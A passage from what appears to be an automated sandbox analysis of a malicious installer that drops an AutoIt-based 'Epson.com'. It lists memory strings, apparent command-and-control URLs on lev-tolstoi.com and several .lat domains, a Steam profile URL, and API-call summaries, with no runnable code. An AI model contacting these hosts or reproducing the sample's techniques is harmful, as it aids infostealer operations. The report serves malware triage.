      Source: Epson.com, 0000000C.00000003.2383733411.000000000404B000.00000004.00000800.00020000.00000000.sdmp, Timer.9.dr, Epson.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
      Source: Epson.com, 0000000C.00000003.2383733411.000000000404B000.00000004.00000800.00020000.00000000.sdmp, SoftWare(1).exe, Timer.9.dr, Epson.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
      Source: SoftWare(1).exeString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
      Source: Epson.com, 0000000C.00000003.2383733411.000000000404B000.00000004.00000800.00020000.00000000.sdmp, Timer.9.dr, Epson.com.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
      Source: SoftWare(1).exeString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
      Source: Epson.com, 0000000C.00000003.2383733411.000000000404B000.00000004.00000800.00020000.00000000.sdmp, SoftWare(1).exe, Timer.9.dr, Epson.com.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
      Source: SoftWare(1).exeString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
      Source: Epson.com, 0000000C.00000002.2468469849.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
      Source: Epson.com, 0000000C.00000002.2468469849.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
      Source: Epson.com, 0000000C.00000002.2468469849.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
      Source: Epson.com, 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmp, Epson.com, 0000000C.00000003.2383733411.000000000404B000.00000004.00000800.00020000.00000000.sdmp, Classifieds.9.dr, Epson.com.2.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
      Source: Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
      Source: Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
      Source: Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
      Source: Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
      Source: Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
      Source: Epson.com, 0000000C.00000002.2468469849.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
      Source: Epson.com, 0000000C.00000002.2468469849.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
      Source: Epson.com, 0000000C.00000002.2468469849.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
      Source: Epson.com, 0000000C.00000002.2468469849.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
      Source: Epson.com, 0000000C.00000002.2468469849.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
      Source: Epson.com, 0000000C.00000002.2468469849.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
      Source: Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
      Source: Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
      Source: Epson.com, 0000000C.00000002.2468098452.0000000003903000.00000004.00000800.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
      Source: Epson.com, 0000000C.00000002.2468469849.0000000003A28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
      Source: Epson.com, 0000000C.00000002.2468098452.0000000003903000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api=
      Source: Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pik
      Source: Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pis
      Source: Epson.com, 0000000C.00000002.2467784156.00000000014B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/api(D
      Source: Epson.com, 0000000C.00000002.2467784156.00000000014B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/apiE
      Source: Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
      Source: Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
      Source: Epson.com, 0000000C.00000002.2467784156.00000000014B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://manyrestro.lat:443/api4
      Source: Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
      Source: Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
      Source: Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
      Source: Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
      Source: Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
      Source: Epson.com, 0000000C.00000002.2467784156.00000000014B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shapestickyr.lat:443/api
      Source: Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
      Source: Epson.com, 0000000C.00000002.2467784156.00000000014B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://slipperyloo.lat:443/api
      Source: Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
      Source: Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
      Source: Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
      Source: Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
      Source: Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
      Source: Epson.com, 0000000C.00000002.2468469849.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
      Source: Epson.com, 0000000C.00000002.2468098452.0000000003903000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
      Source: Epson.com, 0000000C.00000002.2468469849.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
      Source: Epson.com, 0000000C.00000002.2468469849.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
      Source: Epson.com, 0000000C.00000002.2467784156.00000000014B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
      Source: Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
      Source: Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
      Source: Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
      Source: Epson.com, 0000000C.00000002.2468469849.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
      Source: Epson.com, 0000000C.00000002.2468098452.0000000003912000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://talkynicer.lat/api
      Source: Epson.com, 0000000C.00000002.2467784156.00000000014B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://talkynicer.lat:443/api
      Source: Epson.com, 0000000C.00000002.2467784156.00000000014B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tentabatte.lat:443/api
      Source: Epson.com, 0000000C.00000002.2467784156.00000000014B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wordyfindy.lat:443/apiv
      Source: Epson.com, 0000000C.00000003.2383733411.000000000404B000.00000004.00000800.00020000.00000000.sdmp, Timer.9.dr, Epson.com.2.drString found in binary or memory: https://www.autoitscript.com/autoit3/
      Source: Epson.com.2.drString found in binary or memory: https://www.globalsign.com/repository/0
      Source: Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
      Source: Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
      Source: Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
      Source: Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
      Source: Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
      Source: Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49752 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49758 version: TLS 1.2
      Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FCF7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,12_2_00FCF7C7
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FCF55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,12_2_00FCF55C
      Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FE9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,12_2_00FE9FD2
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00F6FFE0 CloseHandle,NtProtectVirtualMemory,12_2_00F6FFE0
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FC4763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,12_2_00FC4763
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FB1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,12_2_00FB1B4D
      Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_004038AF
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FBF20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,12_2_00FBF20D
      Source: C:\Users\user\Desktop\SoftWare(1).exeFile created: C:\Windows\PalmDietJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeFile created: C:\Windows\WebTiJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeFile created: C:\Windows\BarsBoutiqueJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeFile created: C:\Windows\CeramicDJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeFile created: C:\Windows\TheseVeryJump to behavior
      Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_0040737E0_2_0040737E
      Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00406EFE0_2_00406EFE
      Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_004079A20_2_004079A2
      Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_004049A80_2_004049A8
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00F7801712_2_00F78017
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00F5E1F012_2_00F5E1F0
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00F6E14412_2_00F6E144
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00F722A212_2_00F722A2
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00F522AD12_2_00F522AD
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00F8A26E12_2_00F8A26E
